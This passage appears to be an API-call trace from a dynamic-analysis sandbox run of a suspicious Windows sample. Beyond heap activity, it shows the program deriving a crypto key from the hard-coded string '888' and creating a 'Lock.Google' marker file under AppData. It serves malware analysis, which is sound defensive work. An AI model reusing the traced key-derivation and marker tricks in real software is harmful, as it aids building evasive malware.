[0157.591] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0157.591] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0157.591] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.591] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.591] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0157.591] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0157.591] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.591] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.592] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0157.592] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0157.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0157.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaad80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0157.592] CryptCreateHash (in: hProv=0x9be890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0157.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0157.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0157.600] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0157.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0157.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0157.601] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.601] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0157.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaadf8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0157.601] CryptHashData (hHash=0x9e20b8, pbData=0x2a719d8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0157.601] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.601] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.601] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0157.601] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0157.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0157.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaac00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0157.601] CryptDeriveKey (in: hProv=0x9be890, Algid=0x6601, hBaseData=0x9e20b8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0157.601] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.601] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0157.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7000, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0157.602] CryptDestroyHash (hHash=0x9e20b8) returned 1 [0157.602] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Google" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\google"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0157.602] GetLastError () returned 0x5 [0157.602] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0157.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0157.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0157.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0157.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Google" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.google"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0157.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0157.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0157.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0157.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0157.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0157.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0157.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0157.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0157.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0157.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0157.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0157.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0157.606] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0157.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0157.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0157.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0157.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0157.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0157.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0157.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0157.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0157.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0157.608] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0157.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0157.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0157.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0157.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0157.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0157.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0157.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 